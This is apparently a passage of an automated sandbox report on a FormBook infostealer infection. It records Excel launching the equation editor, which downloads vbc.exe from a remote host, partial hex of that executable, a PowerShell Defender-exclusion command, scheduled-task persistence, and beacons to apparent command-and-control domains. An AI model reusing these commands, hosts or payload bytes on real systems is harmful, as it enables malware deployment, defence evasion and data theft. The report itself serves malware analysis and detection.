                                            May 14, 2022 15:10:56.323052883 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.323057890 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.323071957 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.323080063 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.323091984 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.323107004 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330269098 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330296040 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330315113 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330332994 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330348969 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330365896 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330384970 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330403090 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330404997 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330419064 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330437899 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330437899 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330444098 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330449104 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330456018 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330473900 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330481052 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330492020 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330497980 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330509901 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330516100 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330528975 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330530882 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330547094 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330565929 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330565929 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330573082 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330579042 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330584049 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330600023 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330601931 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330620050 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330622911 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330636978 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330636978 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330652952 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330656052 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330668926 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330673933 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330692053 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330694914 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330710888 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330710888 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330725908 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330729961 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330741882 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330746889 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330764055 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330773115 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330784082 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330785990 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330797911 CEST8049173198.12.89.166192.168.2.22
                                            May 14, 2022 15:10:56.330799103 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330813885 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.330826044 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:56.339864969 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:10:59.077002048 CEST4917380192.168.2.22198.12.89.166
                                            May 14, 2022 15:12:19.408072948 CEST4917480192.168.2.22185.53.179.171
                                            May 14, 2022 15:12:19.423587084 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:19.423747063 CEST4917480192.168.2.22185.53.179.171
                                            May 14, 2022 15:12:19.439341068 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:19.439414024 CEST4917480192.168.2.22185.53.179.171
                                            May 14, 2022 15:12:19.454981089 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:19.455019951 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:19.455049038 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:19.455198050 CEST4917480192.168.2.22185.53.179.171
                                            May 14, 2022 15:12:19.455239058 CEST4917480192.168.2.22185.53.179.171
                                            May 14, 2022 15:12:19.471153021 CEST8049174185.53.179.171192.168.2.22
                                            May 14, 2022 15:12:24.610527992 CEST4917580192.168.2.225.183.8.183
                                            May 14, 2022 15:12:24.748250008 CEST80491755.183.8.183192.168.2.22
                                            May 14, 2022 15:12:24.748400927 CEST4917580192.168.2.225.183.8.183
                                            May 14, 2022 15:12:24.748725891 CEST4917580192.168.2.225.183.8.183
                                            May 14, 2022 15:12:24.886285067 CEST80491755.183.8.183192.168.2.22
                                            May 14, 2022 15:12:24.983777046 CEST80491755.183.8.183192.168.2.22
                                            May 14, 2022 15:12:24.983812094 CEST80491755.183.8.183192.168.2.22
                                            May 14, 2022 15:12:24.983921051 CEST4917580192.168.2.225.183.8.183
                                            May 14, 2022 15:12:26.750436068 CEST4917580192.168.2.225.183.8.183
                                            May 14, 2022 15:12:26.888199091 CEST80491755.183.8.183192.168.2.22
                                            TimestampSource PortDest PortSource IPDest IP
                                            May 14, 2022 15:12:19.370465040 CEST5586853192.168.2.228.8.8.8
                                            May 14, 2022 15:12:19.395308971 CEST53558688.8.8.8192.168.2.22
                                            May 14, 2022 15:12:24.475665092 CEST4968853192.168.2.228.8.8.8
                                            May 14, 2022 15:12:24.609047890 CEST53496888.8.8.8192.168.2.22
                                            May 14, 2022 15:12:36.769105911 CEST5883653192.168.2.228.8.8.8
                                            May 14, 2022 15:12:36.791018009 CEST53588368.8.8.8192.168.2.22
                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            May 14, 2022 15:12:19.370465040 CEST192.168.2.228.8.8.80xceeeStandard query (0)www.employeebnsf.comA (IP address)IN (0x0001)
                                            May 14, 2022 15:12:24.475665092 CEST192.168.2.228.8.8.80xc4a9Standard query (0)www.dems-clicks.comA (IP address)IN (0x0001)
                                            May 14, 2022 15:12:36.769105911 CEST192.168.2.228.8.8.80xca6dStandard query (0)www.cariniclinicalconsulting.comA (IP address)IN (0x0001)
                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            May 14, 2022 15:12:19.395308971 CEST8.8.8.8192.168.2.220xceeeNo error (0)www.employeebnsf.com185.53.179.171A (IP address)IN (0x0001)
                                            May 14, 2022 15:12:24.609047890 CEST8.8.8.8192.168.2.220xc4a9No error (0)www.dems-clicks.com5.183.8.183A (IP address)IN (0x0001)
                                            May 14, 2022 15:12:36.791018009 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.cariniclinicalconsulting.com104.21.75.67A (IP address)IN (0x0001)
                                            May 14, 2022 15:12:36.791018009 CEST8.8.8.8192.168.2.220xca6dNo error (0)www.cariniclinicalconsulting.com172.67.215.254A (IP address)IN (0x0001)
                                            • 198.12.89.166
                                            • www.employeebnsf.com
                                            • www.dems-clicks.com
                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.2249173198.12.89.16680C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            TimestampkBytes transferredDirectionData
                                            May 14, 2022 15:10:55.400794983 CEST2OUTGET /55/vbc.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: 198.12.89.166
                                            Connection: Keep-Alive
                                            May 14, 2022 15:10:55.518570900 CEST3INHTTP/1.1 200 OK
                                            Date: Sat, 14 May 2022 13:10:55 GMT
                                            Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                            Last-Modified: Sat, 14 May 2022 08:24:47 GMT
                                            ETag: "b2a00-5def4862be45b"
                                            Accept-Ranges: bytes
                                            Content-Length: 731648
                                            Keep-Alive: timeout=5, max=100
                                            Connection: Keep-Alive
                                            Content-Type: application/x-msdownload
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4f 67 7f 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 20 0b 00 00 08 00 00 00 00 00 00 0a 3f 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3e 0b 00 4f 00 00 00 00 40 0b 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 b9 01 00 80 47 01 00 03 00 00 00 9d 00 00 06 08 01 03 00 b0 3d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1b 00 00 0a 00 00 2a 46 02 28 1b 00 00 0a 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 1c 00 00 0a 00 00 2a 2e 02 03 04 28 1d 00 00 0a 00 00 2a 2e 02 03 04 28 1e 00 00 0a 00 00 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 26 02 28 01 00 00 06 00 00 2a 46 02 28 01 00 00 06 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 03 00 00 06 00 00 2a 2e 02 03 04 28 04 00 00 06 00 00 2a 2e 02 03 04 28 05 00 00 06 00 00 2a 00 13 30 02 00 18 00 00 00 01 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d4 01 00 06 0b 2b 00 07 2a 13 30 02 00 18 00 00 00 02 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d7 01 00 06 0b 2b 00 07 2a 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f da 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d9 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 20 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d5 01 00 06 00 06 6f 24 02 00 06 0b 2b 00 07 2a 13 30 02 00 20 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d8 01 00 06 00 06 6f 24 02 00 06 0b 2b 00 07 2a 2e 28 85 01 00 06 6f 8c 01 00 06 2a 2e 28 85 01 00 06 6f 8d 01 00 06 2a 2e 28 85 01 00 06 6f 8e
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELOgb0 ? @@ @>O@` H.text `.rsrc@"@@.reloc`(@B>HG=&(*F((**(*.(*.(*{*"}*&(*F((**(*.(*.(*0(oo+*0(oo+*0(oo+*0(oo+*0 (ooo$+*0 (ooo$+*.(o*.(o*.(o
                                            May 14, 2022 15:10:55.518635035 CEST5INData Raw: 01 00 06 2a 2e 28 85 01 00 06 6f 88 01 00 06 2a 2e 28 85 01 00 06 6f 89 01 00 06 2a 2e 28 85 01 00 06 6f 98 01 00 06 2a 2e 28 85 01 00 06 6f 99 01 00 06 2a 2e 28 85 01 00 06 6f 9a 01 00 06 2a 2e 28 85 01 00 06 6f 9b 01 00 06 2a 2e 28 85 01 00 06
                                            Data Ascii: *.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o*.(o
                                            May 14, 2022 15:10:55.518676043 CEST6INData Raw: 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 05 00 00 11 02 7b 3b 00 00 04 0a 06 0b 07 03 28 26 00 00 0a 74 1d 00 00 01 0c 02 7c 3b 00 00 04 08 07 28 01 00 00 2b 0a 06 07 33 df 2a 5a 00 02 7b 3b 00 00 04 25 2d 03 26 2b 08 14 14 6f 27 00
                                            Data Ascii: +3*0){;(&t|;(+3*Z{;%-&+o'*.s4*B((}<*^}=()(*0+,{=+,{=o*(+*0s,}>s-}?s-}@
                                            May 14, 2022 15:10:55.518713951 CEST7INData Raw: 7d 45 00 00 04 02 28 29 00 00 0a 00 00 02 28 c3 00 00 06 00 02 03 28 be 00 00 06 00 02 28 bd 00 00 06 00 02 28 c1 00 00 06 00 2a 00 13 30 03 00 dd 00 00 00 00 00 00 00 00 02 02 7b 44 00 00 04 72 39 03 00 70 6f cd 01 00 06 6f 3d 00 00 0a 00 02 7b
                                            Data Ascii: }E()((((*0{Dr9poo={L{DrOpoo={M{Dr[poo={R{Drepoo={P{Drqpoo={O{Dr}poo={H{Drpoo
                                            May 14, 2022 15:10:55.518757105 CEST9INData Raw: 02 73 2d 00 00 0a 7d 4d 00 00 04 02 73 2d 00 00 0a 7d 52 00 00 04 02 73 65 00 00 0a 7d 4e 00 00 04 02 73 64 00 00 0a 7d 54 00 00 04 02 7b 46 00 00 04 6f 30 00 00 0a 00 02 7b 47 00 00 04 6f 30 00 00 0a 00 02 7b 4a 00 00 04 6f 30 00 00 0a 00 02 7b
                                            Data Ascii: s-}Ms-}Rse}Nsd}T{Fo0{Go0{Jo0{So/{To/(0{Fo9{Fof{Fog{Foh"Bsioj&{Foh"Asioj&{Fok{Gol{Fok
                                            May 14, 2022 15:10:55.518815041 CEST10INData Raw: 0a 02 7b 4c 00 00 04 16 16 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 4d 00 00 04 16 17 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 52 00 00 04 16 18 6f 6c 00 00 0a 00 02 7b 4a 00 00 04 6f 6b 00 00 0a 02 7b 4e 00 00 04
                                            Data Ascii: {Lol{Jok{Mol{Jok{Rol{Jok{Nol{Jok{Tol{Js1o2{Jrpo3{Jom{Jonsqop&{Jonsqop&{Jonsqop&{Jonsq
                                            May 14, 2022 15:10:55.518857956 CEST12INData Raw: 00 04 18 6f 3c 00 00 0a 00 02 7b 52 00 00 04 72 e1 05 00 70 6f 3d 00 00 0a 00 02 7b 4e 00 00 04 1a 6f 40 00 00 0a 00 02 7b 4e 00 00 04 1f 2f 1c 73 31 00 00 0a 6f 32 00 00 0a 00 02 7b 4e 00 00 04 19 1c 1c 1c 73 3a 00 00 0a 6f 7e 00 00 0a 00 02 7b
                                            Data Ascii: o<{Rrpo={No@{N/s1o2{Ns:o~{No]{Nrpo3{N s4o5{No<{To@{To{{T%% s|o}{T/fs1o2{Ts:
                                            May 14, 2022 15:10:55.518902063 CEST13INData Raw: 70 6f ab 00 00 0a 16 6f ac 00 00 0a 00 02 7b 5c 00 00 04 6f aa 00 00 0a 72 ab 06 00 70 6f ab 00 00 0a 16 6f ac 00 00 0a 00 02 7b 5c 00 00 04 02 7b 5c 00 00 04 6f aa 00 00 0a 72 b9 06 00 70 6f ab 00 00 0a 16 6f ad 00 00 0a 00 02 7b 5c 00 00 04 6f
                                            Data Ascii: poo{\orpoo{\{\orpoo{\orpoo*0{`o({\oo({2(o?o+,,{Urpo{Urpo0(X&+%{_
                                            May 14, 2022 15:10:55.518944979 CEST15INData Raw: 17 6f 6d 00 00 0a 00 02 7b 58 00 00 04 6f 6e 00 00 0a 18 22 00 00 c8 42 73 6f 00 00 0a 6f 70 00 00 0a 26 02 7b 58 00 00 04 1f 51 1f 25 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 58 00 00 04 18 6f 3c 00 00 0a 00 02 7b 59 00 00 04 1e 6f 40 00 00 0a 00
                                            Data Ascii: om{Xon"Bsoop&{XQ%s4o5{Xo<{Yo@{Yo9{Yoy{Yos{Ys1o2{Yrpo3{Ys:o;{YKs4o5{Yo<{Yr-po={You
                                            May 14, 2022 15:10:55.518989086 CEST16INData Raw: 17 6f 6d 00 00 0a 00 02 7b 5e 00 00 04 6f 6e 00 00 0a 73 71 00 00 0a 6f 70 00 00 0a 26 02 7b 5e 00 00 04 20 16 01 00 00 1f 20 73 34 00 00 0a 6f 35 00 00 0a 00 02 7b 5e 00 00 04 18 6f 3c 00 00 0a 00 02 7b 5f 00 00 04 1a 6f 40 00 00 0a 00 02 7b 5f
                                            Data Ascii: om{^onsqop&{^ s4o5{^o<{_o@{_ s1o2{_s:o~{_% 's|o_{_%s|o^{_rpo3{_8s4o5{_o<{_o
                                            May 14, 2022 15:10:55.632600069 CEST17INData Raw: 06 28 d0 00 00 0a 6f 54 00 00 0a 00 02 7b 6f 00 00 04 02 7b 63 00 00 04 6f 55 02 00 06 6f 3d 00 00 0a 00 02 7b 6e 00 00 04 02 7b 63 00 00 04 6f 57 02 00 06 28 53 00 00 0a 6f 54 00 00 0a 00 2a 00 00 13 30 02 00 6b 00 00 00 00 00 00 00 00 02 7b 6a
                                            Data Ascii: (oT{o{coUo={n{coW(SoT*0k{j((o^{j((o_{o(o]{n((So^{n((So_*06{co"{joZ(,k({


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.2249174185.53.179.17180C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 14, 2022 15:12:19.439414024 CEST775OUTGET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1
                                            Host: www.employeebnsf.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 14, 2022 15:12:19.455019951 CEST776INHTTP/1.1 403 Forbidden
                                            Server: nginx
                                            Date: Sat, 14 May 2022 13:12:19 GMT
                                            Content-Type: text/html
                                            Content-Length: 146
                                            Connection: close
                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.22491755.183.8.18380C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            May 14, 2022 15:12:24.748725891 CEST777OUTGET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1
                                            Host: www.dems-clicks.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            May 14, 2022 15:12:24.983777046 CEST777INHTTP/1.1 404 Not Found
                                            Date: Sat, 14 May 2022 13:12:24 GMT
                                            Server: Apache/2.4.29 (Ubuntu)
                                            Content-Length: 281
                                            Connection: close
                                            Content-Type: text/html; charset=iso-8859-1
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 64 65 6d 73 2d 63 6c 69 63 6b 73 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at www.dems-clicks.com Port 80</address></body></html>


                                            Click to jump to process

                                            Click to jump to process

                                            Click to dive into process behavior distribution

                                            Click to jump to process

                                            Target ID:0
                                            Start time:15:10:18
                                            Start date:14/05/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13f570000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:2
                                            Start time:15:10:44
                                            Start date:14/05/2022
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:4
                                            Start time:15:10:49
                                            Start date:14/05/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Users\Public\vbc.exe"
                                            Imagebase:0x1260000
                                            File size:731648 bytes
                                            MD5 hash:F7ECD12D134AAF3541396C78337CE672
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Yara matches:
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.998332695.0000000002721000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.998529663.00000000027CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            Reputation:low

                                            Target ID:5
                                            Start time:15:10:57
                                            Start date:14/05/2022
                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
                                            Imagebase:0x224d0000
                                            File size:452608 bytes
                                            MD5 hash:92F44E405DB16AC55D97E3BFE3B132FA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:.Net C# or VB.NET
                                            Reputation:high

                                            Target ID:7
                                            Start time:15:10:58
                                            Start date:14/05/2022
                                            Path:C:\Windows\SysWOW64\schtasks.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp
                                            Imagebase:0x210000
                                            File size:179712 bytes
                                            MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Target ID:9
                                            Start time:15:11:00
                                            Start date:14/05/2022
                                            Path:C:\Users\Public\vbc.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\Public\vbc.exe
                                            Imagebase:0x1260000
                                            File size:731648 bytes
                                            MD5 hash:F7ECD12D134AAF3541396C78337CE672
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
